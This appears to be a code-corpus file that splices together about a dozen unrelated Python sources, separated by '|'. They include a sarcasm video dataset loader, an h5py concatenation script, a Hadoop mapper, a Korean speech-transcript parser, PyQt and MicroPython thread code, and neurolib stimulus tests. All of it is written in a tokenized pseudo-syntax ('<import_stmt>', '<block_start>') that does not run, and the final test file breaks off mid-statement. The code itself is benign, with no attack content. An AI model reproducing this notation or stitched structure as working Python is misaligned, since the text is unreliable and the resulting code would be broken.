<import_stmt>json<import_stmt>os<import_from_stmt>typing Callable Dict<import_stmt>PIL.Image<import_stmt>torch<import_stmt>torch.utils.data<class_stmt>SarcasmDataset(torch.utils.data.Dataset)<block_start>"""Dataset of Sarcasm videos."""<line_sep>FRAMES_DIR_PATH='../data/frames/utterances_final'<def_stmt>__init__ self transform:Callable=<none> videos_data_path:str='../data/sarcasm_data.json' check_missing_videos:bool=<true><arrow><none><block_start>self.transform=transform<with_stmt>open(videos_data_path)<as>file<block_start>videos_data_dict=json.load(file)<block_end><for_stmt>video_id list(videos_data_dict.keys())# Convert to list to possibly remove items.
<block_start>video_folder_path=self._video_folder_path(video_id)<if_stmt><not>os.path.exists(video_folder_path)<block_start><if_stmt>check_missing_videos<block_start><raise>FileNotFoundError(f"Directory {video_folder_path} not found, which was referenced in"<concat>f" {videos_data_path}")<block_end><else_stmt><block_start><del_stmt>videos_data_dict[video_id]<block_end><block_end><block_end>self.video_ids=list(videos_data_dict.keys())<line_sep>self.frame_count_by_video_id={video_id:len(os.listdir(self._video_folder_path(video_id)))<for>video_id self.video_ids}<block_end>@staticmethod<def_stmt>_video_folder_path video_id:str<arrow>str<block_start><return>os.path.join(SarcasmDataset.FRAMES_DIR_PATH video_id)<block_end>@staticmethod<def_stmt>features_file_path model_name:str layer_name:str<arrow>str<block_start><return>f'../data/features/utterances_final/{model_name}_{layer_name}.hdf5'<block_end><def_stmt>__getitem__ self index<arrow>Dict[str object]<block_start>video_id=self.video_ids[index]<line_sep>frames=<none><line_sep>video_folder_path=self._video_folder_path(video_id)<for_stmt>i,frame_file_name enumerate(os.listdir(video_folder_path))<block_start>frame=PIL.Image.open(os.path.join(video_folder_path frame_file_name))<if_stmt>self.transform<block_start>frame=self.transform(frame)<block_end><if_stmt>frames<is><none># noinspection PyUnresolvedReferences
<block_start>frames=torch.empty((self.frame_count_by_video_id[video_id] *frame.size()))<block_end>frames[i]=frame<block_end><return>{'id':video_id 'frames':frames}<block_end><def_stmt>__len__ self<arrow>int<block_start><return>len(self.video_ids)<block_end><block_end> |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
<import_from_future_stmt> absolute_import print_function<import_stmt>errno<import_stmt>os<import_stmt>uuid<def_stmt>rename_over_existing src dest<block_start><try_stmt># On Windows, this will throw EEXIST, on Linux it won't.
# on Win32 / Python 2.7 it throws OSError instead of IOError
<block_start>os.rename(src dest)<block_end><except_stmt>(OSError IOError)<as>e<block_start><if_stmt>e.errno<eq>errno.EEXIST# Clearly this song-and-dance is not in fact atomic,
# but if something goes wrong putting the new file in
# place at least the backup file might still be
# around.
<block_start>backup=dest+".bak-"+str(uuid.uuid4())<line_sep>os.rename(dest backup)<try_stmt><block_start>os.rename(src dest)<block_end><except_stmt>Exception<as>e<block_start>os.rename(backup dest)<line_sep><raise>e<block_end><finally_stmt><block_start><try_stmt><block_start>os.remove(backup)<block_end><except_stmt>Exception<block_start><pass><block_end><block_end><block_end><else_stmt><block_start><raise>e<block_end><block_end><block_end> |
"""Linux direct system call interface.
"""<line_sep> |
'''Concatenate multiple files into a single virtual dataset
'''<import_stmt>h5py<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>os<def_stmt>concatenate file_names_to_concatenate<block_start>entry_key='data'# where the data is inside of the source files.
sh=h5py.File(file_names_to_concatenate[0] 'r')[entry_key].shape# get the first ones shape.
layout=h5py.VirtualLayout(shape=(len(file_names_to_concatenate) )+sh dtype=np.float64)<with_stmt>h5py.File("VDS.h5" 'w' libver='latest')<as>f<block_start><for_stmt>i,filename enumerate(file_names_to_concatenate)<block_start>vsource=h5py.VirtualSource(filename entry_key shape=sh)<line_sep>layout[i : : :]=vsource<block_end>f.create_virtual_dataset(entry_key layout fillvalue=0)<block_end><block_end><def_stmt>create_random_file folder index<block_start>"""create one random file"""<line_sep>name=os.path.join(folder 'myfile_'+str(index))<with_stmt>h5py.File(name=name mode='w')<as>f<block_start>d=f.create_dataset('data' (5 10 20) 'i4')<line_sep>data=np.random.randint(low=0 high=100 size=(5<times>10<times>20))<line_sep>data=data.reshape(5 10 20)<line_sep>d[:]=data<block_end><return>name<block_end><def_stmt>main argv<block_start>files=argv[1:]<if_stmt>len(files)<eq>0<block_start><import_stmt>tempfile<line_sep>tmp_dir=tempfile.mkdtemp()<for_stmt>i_file range(5)<block_start>files.append(create_random_file(tmp_dir index=i_file))<block_end><block_end>concatenate(files)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main(sys.argv)<block_end> |
<import_from_stmt>.aspp ASPP<import_from_stmt>.deeplabv3 DeepLabV3Decoder<import_from_stmt>.deeplabv3plus DeepLabV3PlusDecoder<import_from_stmt>.panoptic_deeplab PanopticDeepLabDecoder<line_sep> |
x=10<line_sep>y='Hi'<line_sep>z='Hello'<line_sep>print(y)<line_sep># breakpoint() is introduced in Python 3.7
breakpoint()<line_sep>print(z)<line_sep># Execution Steps
# Default:
# $python3.7 python_breakpoint_examples.py
# Disable Breakpoint:
# $PYTHONBREAKPOINT=0 python3.7 python_breakpoint_examples.py
# Using Other Debugger (for example web-pdb):
# $PYTHONBREAKPOINT=web_pdb.set_trace python3.7 python_breakpoint_examples.py
|
<import_from_stmt>hadooplib.mapper MapperBase<import_from_stmt>hadooplib.inputformat KeyValueInput<class_stmt>TFIDFMapper1(MapperBase)<block_start>"""
keep only the word in the key field
remove filename from key and put it into value
(word filename, number) -> (word, filename number)
e.g. (dog 1.txt, 1) -> (dog, 1.txt 1)
"""<def_stmt>__init__ self<block_start>MapperBase.__init__(self)<line_sep>self.set_inputformat(KeyValueInput)<block_end><def_stmt>map self key value<block_start>"""
extract filename from key and put it into value
@param key: word and filename
@param value: term frequency
"""<line_sep>word,filename=key.split()<line_sep>self.outputcollector.collect(word filename+","+value)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>TFIDFMapper1().call_map()<block_end> |
<import_stmt>os<import_stmt>re<import_from_stmt>glob glob<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Dict<import_from_stmt>.korpora Korpus KorpusData<import_from_stmt>.utils default_korpora_path<line_sep>description=""" AI Hub 에서는 학습용 데이터를 제공합니다.
데이터를 활용하기 위해서는 아래 주소의 홈페이지에서 "AI데이터" 클릭 후,
이용하려는 데이터마다 직접 신청을 하셔야 합니다.
https://www.aihub.or.kr/
한국어 음성 데이터는 `AI 데이터` > `교육/문화/스포츠/` > `한국어음성` 혹은 아래의 주소에서
다운받으실 수 있으며, AI Hub에서는 1000시간 분량의 전체 음원데이터 뿐 아니라, 전사 스크립트(Text only)만을
따로 평문 텍스트(확장자: trn) 형식으로도 제공하고 있습니다.
https://www.aihub.or.kr/aidata/105 (2021.01.27 기준)
AI Hub 학습데이터는 신청 즉시 자동 승인됩니다.
Korpora>=0.3.0 에서는 로컬에 다운로드 된 말뭉치를 손쉽게 로딩하는 기능만 제공합니다.
이 스크립트는 전사스크립트 묶음 파일(KsponSpeech_scripts.zip)을 사용합니다. 이 파일을 압축 풀면
아래와 같은 파일들이 나옵니다.
train.trn
dev.trn
eval_clean.trn
eval_other.trn
위 파일들은 `~/Korpora/AIHub_KsponSpeech_scripts/` 혹은 `path/to/AIHub_KsponSpeech_scripts/` 에
저장되었다고 가정합니다.
(Korpora 개발진 <EMAIL>, <EMAIL>)"""<line_sep>license=""" AI Hub 에서 제공하는 데이터의 소유권 및 전문은 다음의 주소에서 확인할 수 있습니다.
https://aihub.or.kr/form/iyongyaggwan
제16조 포털의 소유권
1. AI 허브가 제공하는 서비스, 그에 필요한 소프트웨어, 이미지, 마크, 로고, 디자인, 서비스명칭, 정보 및
상표 등과 관련된 지식재산권 및 기타 권리는 운영기관(및 AI허브 서비스 제공과 관련하여 운영기관과 계약을
체결한 기관)에 소유권이 있습니다.
2. 귀하는 AI 허브에서 명시적으로 승인한 경우를 제외하고는 전항의 소정의 각 재산에 대한 전부 또는 일부의 수정,
대여, 대출, 판매, 배포, 제작, 양도, 재라이센스, 담보권 설정 행위, 상업적 이용 행위를 할 수 없으며,
제3자로 하여금 이와 같은 행위를 하도록 허락할 수 없습니다"""<class_stmt>AIHubKsponSpeechKorpus(Korpus)<block_start><def_stmt>__init__ self root_dir=<none> force_download=<false> prefix='' name='AIHub_KsponSpeech'<block_start>super().__init__(description license)<if_stmt>root_dir<is><none><block_start>root_dir=os.path.join(default_korpora_path 'AIHub_KsponSpeech_scripts' prefix)<block_end><elif_stmt>isinstance(root_dir str)<and>os.path.isdir(root_dir)<block_start>root_dir=os.path.join(root_dir 'AIHub_KsponSpeech_scripts' prefix)<block_end>paths=find_corpus_paths(root_dir)<line_sep>self.train=KorpusData(f'{name}.train' load_aihub_kspon_speech_scripts(paths))<block_end><block_end>@dataclass<class_stmt>KsponSpeech<block_start>sentence_id:str<line_sep>sentence:str<line_sep>pronounce_sentence:str<line_sep>original_sentence:str<line_sep>pronounces:Dict[str str]<def_stmt>__str__ self<block_start><return>self.__repr__()<block_end><def_stmt>__repr__ self<block_start><return>f"""KsponSpeech(
id={self.sentence_id},
sentence={self.sentence},
pronounce_sentence={self.pronounce_sentence},
original_sentence={self.original_sentence},
pronounces={self.pronounces},
)"""<block_end><block_end><def_stmt>find_corpus_paths root_dir suffix='.trn'<block_start><def_stmt>match path<block_start><return>path[-4:]<eq>suffix<block_end># directory + wildcard
<if_stmt>isinstance(root_dir str)<block_start>paths=sorted(glob(f'{root_dir}/*{suffix}')+glob(root_dir))<block_end><else_stmt><block_start>paths=root_dir<block_end>paths=[path<for>path paths<if>match(path)]<if_stmt><not>paths<block_start><raise>ValueError('Not found corpus files. Check `root_dir`')<block_end><return>paths<block_end><def_stmt>parse_kspon_speech line<block_start>sentence_id,original_sentence=line.split(' :: ')<line_sep># Cleaning - remove unknown/noise labels
sentence=re.sub(r'\s*[ublon]/\s*' r' ' original_sentence)<line_sep># Cleaning - remove meaningless character(maybe typo in original transcription)
sentence=re.sub(r'^/ ' r' ' sentence)<line_sep># Cleaning - remove repetition characters
sentence=re.sub(r'[\+\*]' r'' sentence)<line_sep>pronounces=dict(re.findall(r'\(([^\)]+)\)/\(([^\)]+)\)' sentence))<line_sep>pron_sentence=re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)' r'\2' sentence)<line_sep>sentence=re.sub(r'\(([^\)]+)\)/\(([^\)]+)\)' r'\1' sentence)<line_sep># Cleaning - remove filler characters
sentence=re.sub(r'(?<=[^\)])/\s*' r' ' sentence)<line_sep>pron_sentence=re.sub(r'(?<=[^\)])/\s*' r' ' pron_sentence)<line_sep># Cleaning - remove space+
sentence=re.sub(r' +' r' ' sentence)<line_sep>pron_sentence=re.sub(r' +' r' ' pron_sentence)<line_sep>original_sentence=original_sentence.strip()<line_sep>pron_sentence=pron_sentence.strip()<line_sep>sentence=sentence.strip()<line_sep><return>sentence_id sentence pron_sentence original_sentence pronounces<block_end><def_stmt>load_aihub_kspon_speech_scripts paths<block_start>examples=[]<for_stmt>path paths<block_start><with_stmt>open(path encoding='utf-8')<as>f<block_start>examples<augadd>[KsponSpeech(*parse_kspon_speech(line))<for>line f.readlines()]<block_end><block_end><return>examples<block_end> |
# -*- coding: utf-8 -*-
"""
:copyright: 2015 Agile Geoscience
:license: Apache 2.0
"""<import_from_stmt>.energy energy<import_from_stmt>.similarity similarity<import_from_stmt>.dipsteer dipsteer<import_from_stmt>.spectrogram spectrogram<import_from_stmt>.spectraldecomp spectraldecomp<line_sep> |
<import_from_stmt>PyQt5.QtWidgets QAction QFileDialog QMenu QPushButton<import_from_stmt>inselect.lib.user_template UserTemplate<import_from_stmt>inselect.lib.utils debug_print<import_from_stmt>.user_template_choice user_template_choice<import_from_stmt>.utils load_icon reveal_path<class_stmt>UserTemplatePopupButton(QPushButton)<block_start>"User template popup button"<line_sep>FILE_FILTER='Inselect user templates (*{0})'.format(UserTemplate.EXTENSION)<def_stmt>__init__ self parent=<none><block_start>super(UserTemplatePopupButton self).__init__(parent)<line_sep># Configure the UI
self._create_actions()<line_sep>self.popup=QMenu()<line_sep>self.inject_actions(self.popup)<line_sep>self.setMenu(self.popup)<line_sep>user_template_choice().template_changed.connect(self.changed)<line_sep># User template might already have been loaded so load the initial
<if_stmt>user_template_choice().current<block_start>self.changed()<block_end><block_end><def_stmt>__del__ self# Doing this prevents segfault on exit. Unsatisfactory.
<block_start><del_stmt>self.popup<block_end><def_stmt>_create_actions self<block_start>self._choose_action=QAction("Choose..." self triggered=self.choose icon=load_icon(':/icons/open.png'))<line_sep>self._refresh_action=QAction("Reload" self triggered=self.refresh icon=load_icon(':/icons/refresh.png'))<line_sep>self._reveal_template_action=QAction("Reveal template" self triggered=self.reveal)<line_sep>self._default_action=QAction("Default ({0})".format(user_template_choice().DEFAULT.name) self triggered=self.default icon=load_icon(':/icons/close.png'))<block_end><def_stmt>inject_actions self menu<block_start>"Adds user template actions to menu"<line_sep>menu.addAction(self._choose_action)<line_sep>menu.addAction(self._refresh_action)<line_sep>menu.addAction(self._reveal_template_action)<line_sep>menu.addSeparator()<line_sep>menu.addAction(self._default_action)<block_end><def_stmt>default self checked=<false><block_start>"Sets the default template"<line_sep>user_template_choice().select_default()<block_end><def_stmt>choose self checked=<false><block_start>"Shows a 'choose template' file dialog"<line_sep>debug_print('UserTemplateWidget.choose')<line_sep>path,selectedFilter=QFileDialog.getOpenFileName(self "Choose user template" str(user_template_choice().last_directory()) self.FILE_FILTER)<if_stmt>path# Save the user's choice
<block_start>user_template_choice().load(path)<block_end><block_end><def_stmt>refresh self checked=<false><block_start>debug_print('UserTemplateWidget.refresh')<line_sep>user_template_choice().refresh()<block_end><def_stmt>reveal self checked=<false><block_start>reveal_path(user_template_choice().current_path)<block_end><def_stmt>changed self<block_start>"Slot for UserTemplateChoice.template_changed"<line_sep>debug_print('UserTemplateWidget.changed')<line_sep>choice=user_template_choice()<line_sep>self.setText(choice.current.name)<line_sep>self._default_action.setEnabled(<not>choice.current_is_default)<line_sep>self._refresh_action.setEnabled(<not>choice.current_is_default)<line_sep>self._reveal_template_action.setEnabled(<not>choice.current_is_default)<block_end><block_end> |
<import_stmt>machine _thread time<import_stmt>micropython gc<import_stmt>bme280<line_sep># Setup the LED pins
bled=machine.Pin(4 mode=machine.Pin.OUT)<line_sep>#rled = machine.Pin(0, mode=machine.Pin.OUT)
#gled = machine.Pin(2, mode=machine.Pin.OUT)
bled.value(0)<line_sep>#gled.value(0)
#rled.value(0)
# Setup I2C to be used with BME280 sensor
i2c=machine.I2C(scl=machine.Pin(26) sda=machine.Pin(25) speed=400000)<line_sep># Initialize BME280
bme=bme280.BME280(i2c=i2c)<line_sep># Define LED thread function
#---------------------------
<def_stmt>rgbled n=200 led=bled<block_start>notif_exit=4718<line_sep>notif_replay=2<line_sep>notif_count=3<line_sep>x=0<line_sep>_thread.allowsuspend(<true>)<while_stmt><true><block_start>led.value(1)<line_sep>time.sleep_ms(n)<line_sep>led.value(0)<line_sep>x=x+1<line_sep>t=10<while_stmt>t<g>0<block_start>notif=_thread.getnotification()<if_stmt>notif<eq>notif_exit<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Exiting"%(_thread.getSelfName()))<line_sep><return><block_end><elif_stmt>notif<eq>notif_replay<block_start>_thread.sendmsg(_thread.getReplID() "[%s] I've been notified"%(_thread.getSelfName()))<block_end><elif_stmt>notif<eq>notif_count<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Run counter = %u"%(_thread.getSelfName() x))<block_end><elif_stmt>notif<eq>777<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Forced EXCEPTION"%(_thread.getSelfName()))<line_sep>time.sleep_ms(1000)<line_sep>zz=234/0<block_end><elif_stmt>notif<ne>0<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Got unknown notification: %u"%(_thread.getSelfName() notif))<block_end>typ,sender,msg=_thread.getmsg()<if_stmt>msg<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Message from '%s'\n'%s'"%(_thread.getSelfName() _thread.getThreadName(sender) msg))<block_end>time.sleep_ms(100)<line_sep>t=t-1<block_end>gc.collect()<block_end><block_end># For LED thread we don't need more than 3K stack
_=_thread.stack_size(3<times>1024)<line_sep># Start LED thread
#rth=_thread.start_new_thread("R_Led", rgbled, (100, rled))
time.sleep_ms(500)<line_sep>#gth=_thread.start_new_thread("G_Led", rgbled, (250, gled))
bth=_thread.start_new_thread("B_Led" rgbled (100 bled))<line_sep># Function to generate BME280 values string
#---------------
<def_stmt>bmevalues <block_start>t,p,h=bme.read_compensated_data()<line_sep>p=p<floordiv>256<line_sep>pi=p<floordiv>100<line_sep>pd=p-pi<times>100<line_sep>hi=h<floordiv>1024<line_sep>hd=h<times>100<floordiv>1024-hi<times>100<line_sep>#return "[{}] T={0:1g}C ".format(time.strftime("%H:%M:%S",time.localtime()), round(t / 100,1)) + "P={}.{:02d}hPa ".format(pi, pd) + "H={}.{:01d}%".format(hi, hd)
<return>"[{}] T={}C ".format(time.strftime("%H:%M:%S" time.localtime()) t/100)+"P={}.{:02d}hPa ".format(pi pd)+"H={}.{:02d}%".format(hi hd)<block_end># Define BME280 thread function
#-----------------------
<def_stmt>bmerun interval=60<block_start>_thread.allowsuspend(<true>)<line_sep>sendmsg=<true><line_sep>send_time=time.time()+interval<while_stmt><true><block_start><while_stmt>time.time()<l>send_time<block_start>notif=_thread.getnotification()<if_stmt>notif<eq>10002<block_start>_thread.sendmsg(_thread.getReplID() bmevalues())<block_end><elif_stmt>notif<eq>10004<block_start>sendmsg=<false><block_end><elif_stmt>notif<eq>10006<block_start>sendmsg=<true><block_end><elif_stmt>(notif<le>3600)<and>(notif<ge>10)<block_start>interval=notif<line_sep>send_time=time.time()+interval<line_sep>_thread.sendmsg(_thread.getReplID() "Interval set to {} seconds".format(interval))<block_end>time.sleep_ms(100)<block_end>send_time=send_time+interval<if_stmt>sendmsg<block_start>_thread.sendmsg(_thread.getReplID() bmevalues())<block_end><block_end><block_end># 3K is enough for BME280 thread
_=_thread.stack_size(3<times>1024)<line_sep># start the BME280 thread
bmeth=_thread.start_new_thread("BME280" bmerun (60 ))<line_sep># === In the 3rd thread we will run Neopixels rainbow demo ===
np=machine.Neopixel(machine.Pin(22) 24)<line_sep># DEfine Neopixels thread function
#---------------
<def_stmt>thrainbow <block_start>pos=0<line_sep>bri=0.02<while_stmt><true><block_start><for_stmt>i range(0 24)<block_start>dHue=360.0/24<times>(pos+i)<line_sep>hue=dHue%360<line_sep>np.setHSB(i hue 1.0 bri 1 <false>)<block_end>np.show()<line_sep>notif=_thread.getnotification()<if_stmt>(notif<g>0)<and>(notif<le>100)<block_start>bri=notif/100.0<block_end><elif_stmt>notif<eq>1000<block_start>_thread.sendmsg(_thread.getReplID() "[%s] Run counter = %u"%(_thread.getSelfName() pos))<block_end>pos=pos+1<block_end><block_end># Start the Neopixels thread
npth=_thread.start_new_thread("Neopixel" thrainbow ())<line_sep>utime.sleep(1)<line_sep>machine.heap_info()<line_sep>_thread.list()<line_sep># Set neopixel brightnes (%)
#_thread.notify(npth, 20)
# Get counter value from Neopixel thread
#_thread.notify(npth, 1000)
|
<import_from_stmt>.base BaseImportTestCase<class_stmt>MetaHeaderTestCase(BaseImportTestCase)<block_start>serializer_name="tests.naturalkey_app.wizard.NoteMetaSerializer"<def_stmt>test_manual self<block_start>run=self.upload_file("naturalkey_meta.xlsx")<line_sep># Inspect unmatched columns and select choices
self.check_columns(run 4 4)<line_sep>self.update_columns(run {"Note":{"Date:":"event[date]" "Place:":"event[place][name]" "Note":"note" "Status":"status" }} )<line_sep># Start data import process, wait for completion
self.start_import(run [])<line_sep># Verify results
self.assert_log(run ["created" "parse_columns" "update_columns" "do_import" "import_complete" ] )<line_sep>self.assert_records(run ["Imported 'Minneapolis on 2019-01-01: Test Note 1' at row 4" "Imported 'Minneapolis on 2019-01-01: Test Note 2' at row 5" "Imported 'Minneapolis on 2019-01-01: Test Note 3' at row 6" ] )<block_end><block_end> |
"""A simple timer implementation.
Copyright 2018 The AdaNet Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>time<class_stmt>_CountDownTimer(object)<block_start>"""A simple count down timer implementation."""<def_stmt>__init__ self duration_secs<block_start>"""Initializes a `_CountDownTimer`.
Args:
duration_secs: Float seconds for countdown.
Returns:
A `_CountDownTimer` instance.
"""<line_sep>self._start_time_secs=time.time()<line_sep>self._duration_secs=duration_secs<block_end><def_stmt>secs_remaining self<block_start>"""Returns the remaining countdown seconds."""<line_sep>diff=self._duration_secs-(time.time()-self._start_time_secs)<line_sep><return>max(0. diff)<block_end><block_end> |
"""
Tests of noise input.
"""<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>chspy CubicHermiteSpline<import_from_stmt>neurolib.models.aln ALNModel<import_from_stmt>neurolib.utils.stimulus ConcatenatedStimulus ExponentialInput LinearRampInput OrnsteinUhlenbeckProcess RectifiedInput SinusoidalInput SquareInput StepInput SummedStimulus WienerProcess ZeroInput <line_sep>TESTING_TIME=5.3<line_sep>DURATION=10<line_sep>DT=0.1<line_sep>STIM_START=2<line_sep>STIM_END=8<line_sep>SHAPE=(2 int(DURATION/DT))<class_stmt>TestCubicSplines(unittest.TestCase)<block_start>RESULT_SPLINES=np.array([-0.214062 -0.215043])<line_sep>RESULT_ARRAY=np.array([0.193429 0.073445])<def_stmt>test_splines self<block_start>dW=WienerProcess(n=2 seed=42).as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW CubicHermiteSpline))<line_sep>np.testing.assert_allclose(self.RESULT_SPLINES dW.get_state(TESTING_TIME) atol=1e-05)<block_end><def_stmt>test_arrays self<block_start>dW=WienerProcess(n=2 seed=42).as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW np.ndarray))<line_sep>time_idx=np.around(TESTING_TIME/DT).astype(int)<line_sep>np.testing.assert_allclose(self.RESULT_ARRAY dW[: time_idx] atol=1e-05)<block_end><def_stmt>test_shift_start_time self<block_start>SHIFT=5.0<line_sep>dW=WienerProcess(n=2 seed=42).as_cubic_splines(duration=DURATION dt=DT shift_start_time=SHIFT)<line_sep>self.assertTrue(isinstance(dW CubicHermiteSpline))<line_sep>self.assertEqual(dW[0].time SHIFT+DT)<line_sep>np.testing.assert_allclose(self.RESULT_SPLINES dW.get_state(TESTING_TIME+SHIFT) atol=1e-05)<block_end><block_end><class_stmt>TestToModel(unittest.TestCase)<block_start><def_stmt>test_single_node self<block_start>model=ALNModel()<line_sep>model.params["duration"]=2<times>1000<line_sep>stim=SinusoidalInput(amplitude=1.0 frequency=1.0)<line_sep>model_stim=stim.to_model(model)<line_sep>model.params["ext_exc_current"]=model_stim<line_sep>model.run()<line_sep>self.assertTrue(isinstance(model_stim np.ndarray))<line_sep>self.assertTupleEqual(model_stim.shape (1 int(model.params["duration"]/model.params["dt"])))<block_end><def_stmt>test_multi_node_multi_stim self<block_start>model=ALNModel(Cmat=np.random.rand(5 5) Dmat=np.zeros((5 5)))<line_sep>model.params["duration"]=2<times>1000<line_sep>stim=SinusoidalInput(amplitude=1.0 frequency=1.0)<line_sep>model_stim=stim.to_model(model)<line_sep>model.params["ext_exc_current"]=model_stim<line_sep>model.run()<line_sep>self.assertTrue(isinstance(model_stim np.ndarray))<line_sep>self.assertTupleEqual(model_stim.shape (5 int(model.params["duration"]/model.params["dt"])))<block_end><block_end><class_stmt>TestZeroInput(unittest.TestCase)<block_start><def_stmt>test_generate_input self<block_start>nn=ZeroInput(n=2 seed=42).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(nn np.ndarray))<line_sep>self.assertTupleEqual(nn.shape SHAPE)<line_sep>np.testing.assert_allclose(nn np.zeros(SHAPE))<block_end><def_stmt>test_get_params self<block_start>nn=ZeroInput(n=2 seed=42)<line_sep>params=nn.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42})<block_end><def_stmt>test_set_params self<block_start>nn=ZeroInput(n=2 seed=42)<line_sep>UPDATE={"seed":635}<line_sep>nn.update_params(UPDATE)<line_sep>params=nn.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 **UPDATE})<block_end><block_end><class_stmt>TestWienerProcess(unittest.TestCase)<block_start><def_stmt>test_generate_input self<block_start>dW=WienerProcess(n=2 seed=42).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(dW np.ndarray))<line_sep>self.assertTupleEqual(dW.shape SHAPE)<block_end><def_stmt>test_get_params self<block_start>dW=WienerProcess(n=2 seed=42)<line_sep>params=dW.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42})<block_end><def_stmt>test_set_params self<block_start>dW=WienerProcess(n=2 seed=42)<line_sep>UPDATE={"seed":6152 "n":5}<line_sep>dW.update_params(UPDATE)<line_sep>params=dW.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 **UPDATE})<block_end><block_end><class_stmt>TestOrnsteinUhlenbeckProcess(unittest.TestCase)<block_start><def_stmt>test_generate_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ou np.ndarray))<line_sep>self.assertTupleEqual(ou.shape SHAPE)<block_end><def_stmt>test_get_params self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 )<line_sep>params=ou.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "mu":3.0 "sigma":0.1 "tau":2<times>DT})<block_end><def_stmt>test_set_params self<block_start>ou=OrnsteinUhlenbeckProcess(mu=3.0 sigma=0.1 tau=2<times>DT n=2 seed=42 )<line_sep>UPDATE={"mu":2.3 "seed":12}<line_sep>ou.update_params(UPDATE)<line_sep>params=ou.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "mu":3.0 "sigma":0.1 "tau":2<times>DT **UPDATE})<block_end><block_end><class_stmt>TestStepInput(unittest.TestCase)<block_start>STEP_SIZE=2.3<def_stmt>test_generate_input self<block_start>step=StepInput(step_size=self.STEP_SIZE n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(step np.ndarray))<line_sep>self.assertTupleEqual(step.shape SHAPE)<line_sep>np.testing.assert_allclose(step self.STEP_SIZE)<block_end><def_stmt>test_start_end_input self<block_start>step=StepInput(start=STIM_START end=STIM_END step_size=self.STEP_SIZE n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(step[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(step[: int(STIM_END/DT):] 0.0)<block_end><block_end><class_stmt>TestSinusoidalInput(unittest.TestCase)<block_start>AMPLITUDE=2.3<line_sep>FREQUENCY=1000.0<def_stmt>test_generate_input self<block_start>sin=SinusoidalInput(amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 dc_bias=<true>).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(sin np.ndarray))<line_sep>self.assertTupleEqual(sin.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.mean(sin axis=1) np.array(2<times>[self.AMPLITUDE]))<block_end><def_stmt>test_start_end_input self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(sin[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(sin[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>params=sin.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "start":STIM_START "dc_bias":<false> "end":STIM_END } )<block_end><def_stmt>test_set_params self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>UPDATE={"amplitude":43.0 "seed":12 "start":"None"}<line_sep>sin.update_params(UPDATE)<line_sep>params=sin.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "dc_bias":<false> "end":STIM_END **UPDATE "start":<none> } )<block_end><block_end><class_stmt>TestSquareInput(unittest.TestCase)<block_start>AMPLITUDE=2.3<line_sep>FREQUENCY=20.0<def_stmt>test_generate_input self<block_start>sq=SquareInput(amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(sq np.ndarray))<line_sep>self.assertTupleEqual(sq.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.mean(sq axis=1) 